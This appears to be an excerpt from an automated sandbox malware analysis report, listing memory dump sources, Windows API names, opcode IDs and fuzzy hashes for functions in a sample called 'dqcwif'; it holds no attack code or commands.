                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                          • API String ID: 2574300362-1816364905
                                                                                                          • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                          • Instruction ID: e26b857a9a1b43fff02ffcd00d6c49770e65adbcaf1bd910a8017a112df44660
                                                                                                          • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                          • Instruction Fuzzy Hash: 09F0AC61A15F0582EF199B58E4A43B823E4FB19F19F940435CA1D863A9EFBCDD69C340
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                          • API String ID: 2574300362-192647395
                                                                                                          • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                          • Instruction ID: 2ee703889e528eb58261f461ed20fc96fa1123864ba847807047247de08038a5
                                                                                                          • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                          • Instruction Fuzzy Hash: CAE01262959F0682EF148B18E4643B823E0FB59F58F840435CA1E863DAEFBCD995C300
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                          • Instruction ID: bd9fb6e74ff219b6064173b2c0aebda7c79ee90eced656532f326835df8f8a71
                                                                                                          • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                          • Instruction Fuzzy Hash: 3DD10566B04B5686EB148F3AC4A02AC37B0FB89F88B159426DF5D87B69DF39D844C311
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                          • Instruction ID: 0f22bb4c88787751a65137ff61ef3cd4069bc0e7422d0d5d6990a26220915f74
                                                                                                          • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                          • Instruction Fuzzy Hash: C1D15C76B04B419AEB10EB69D4A01EC37B5FB45B88B404436DF0D97B9ADF78E919C380
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1249313431-0
                                                                                                          • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                          • Instruction ID: 1901fe3c92d7bd14058a2c6e6396a0be5c0de4b280da62054df3fed4450e0947
                                                                                                          • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                          • Instruction Fuzzy Hash: 5351A03AA04A828AEB50CF29D4906F93761F785F98F504136DB2D97789DF79EC41C300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2267087916-0
                                                                                                          • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                          • Instruction ID: a43f50b08b06132818a5e914d1732121bf752af4b891e599e3c7b566aaf407fe
                                                                                                          • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                          • Instruction Fuzzy Hash: 01517A22B09A1185EF548B6AD8605EC63B5FB56F94B544135DF0D937AEDF3CD9428300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$socket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1881357543-0
                                                                                                          • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                          • Instruction ID: 97fc37031a3c1a5ef5d812fa164f2c2fff06b0695941902a2e2f87616e7ad6e9
                                                                                                          • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                          • Instruction Fuzzy Hash: 7B41946170868286EB14EF1AA4606A96B91FB86FE0F444534DF1D9B7DBCF3DD8018750
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3321077145-0
                                                                                                          • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                          • Instruction ID: fb017cca34603db25d047d1db463d6be5cbc5f4f26f161f9e02361441eda92cb
                                                                                                          • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                          • Instruction Fuzzy Hash: 6C410D66B04B4681DB10DF2AD4A14AD7760FB89FD0B489432DF5E877ABCE3DE8418710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 4141327611-0
                                                                                                          • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                                          • Instruction ID: fe898989253bbd1eef4e99bb4ad8d35776cfa447f2165d9f6233e0113db2a663
                                                                                                          • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                                          • Instruction Fuzzy Hash: DF41953290974286FB699B28F0703F96692AF42F90F144130DB4986EDFDF2CDC428700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3340791633-0
                                                                                                          • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                                          • Instruction ID: b5886d497e28d4daeb5bc001b4331f7b3770f564e3a7e6d00eabaefb25168683
                                                                                                          • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                                          • Instruction Fuzzy Hash: C8419D21E0854686FB648B18C6613F86761EB96F95F185132D72E836DBCF3CEC818708
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1463438336-0
                                                                                                          • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                          • Instruction ID: 5c16e3c38fb455004275e09bdf82ce5feeea0f58bde5346eb928e9a3999d823b
                                                                                                          • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                          • Instruction Fuzzy Hash: D4314D36A08B4286FB649B1AE4607B9A361FB4AF94F044135DB4D47B8EDF3CE8548B40
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6B5B5A27B,?,?,?,00007FF6B5B5A236), ref: 00007FF6B5B63DB1
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6B5B5A27B,?,?,?,00007FF6B5B5A236), ref: 00007FF6B5B63E13
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6B5B5A27B,?,?,?,00007FF6B5B5A236), ref: 00007FF6B5B63E4D
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6B5B5A27B,?,?,?,00007FF6B5B5A236), ref: 00007FF6B5B63E77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                          • String ID:
                                                                                                          • API String ID: 1557788787-0
                                                                                                          • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                                          • Instruction ID: a7f4e051221fa3a0d981e2e6dddae1d6bd952634605b28b9066a0807d8b77374
                                                                                                          • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                                          • Instruction Fuzzy Hash: 83218422F1875181E6209F19A450069B6A5FF55FD0B084134DF8EA3BDEDF3CE852C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID:
                                                                                                          • API String ID: 847901565-0
                                                                                                          • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                          • Instruction ID: 102c35dfb655aceebe07682fb7f262ba9f9a07b07b2dffd3de5eda337883b9a6
                                                                                                          • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                          • Instruction Fuzzy Hash: 8021F621A08B4186EA509B2998A47B937A1EF86FA0F150334DB6D877DADF7CE841C304
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3970641297-0
                                                                                                          • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                          • Instruction ID: e6485b0a0f067995ff741975ce6c4910c2ebc5e27fa5daa5f65725540bc97696
                                                                                                          • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                          • Instruction Fuzzy Hash: 112144726087C587E7648B19E4547AABBA0FB89B84F540135DB8D83B99DF7CD884CF00
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF6B5B22A54: GetWindowLongPtrW.USER32 ref: 00007FF6B5B22A71
                                                                                                          • GetClientRect.USER32(?,?,?,?,?,00007FF6B5B6AA36,?,?,?,?,?,?,?,?,?,00007FF6B5B227AF), ref: 00007FF6B5BD22C4
                                                                                                          • GetCursorPos.USER32(?,?,?,?,?,00007FF6B5B6AA36,?,?,?,?,?,?,?,?,?,00007FF6B5B227AF), ref: 00007FF6B5BD22CF
                                                                                                          • ScreenToClient.USER32 ref: 00007FF6B5BD22DD
                                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,00007FF6B5B6AA36,?,?,?,?,?,?,?,?,?,00007FF6B5B227AF), ref: 00007FF6B5BD231F
                                                                                                            • Part of subcall function 00007FF6B5BCE894: LoadCursorW.USER32 ref: 00007FF6B5BCE945
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1626762757-0
                                                                                                          • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                                          • Instruction ID: 09eefc38320d34c0b56c91a595b782bbdf1e7aaf1a8bd20cb7dce07c0f95c13c
                                                                                                          • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                                          • Instruction Fuzzy Hash: 43213036A4869696EA14DF09E4A15A9B371FB86F84F540131EB4D87B9ECF3CED41CB00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                          • Instruction ID: e8b469750c4d1db74e93456d162cf3da72ec045c9b1a2c6539c764e47bb4ccd7
                                                                                                          • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                          • Instruction Fuzzy Hash: 4E2124B6A04B41DEEB00CF78D89459C77B0F348B48B004826EB1893B5CEF78DA64CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$abort
                                                                                                          • String ID:
                                                                                                          • API String ID: 1447195878-0
                                                                                                          • Opcode ID: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                                                          • Instruction ID: 4e46ee59d9cf038ba4c665e689d826ab1a96adcd4595eb4a202b8ac09fdf87ea
                                                                                                          • Opcode Fuzzy Hash: 93a8c6ec86c577cad6803fb95bafd4c8778ff4d5622681f9be56b0e8e8078c7b
                                                                                                          • Instruction Fuzzy Hash: 7E011720A0924242EA5CA779F5765F811617F4AF90F545538DB1F867DFEE2CAC414600
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
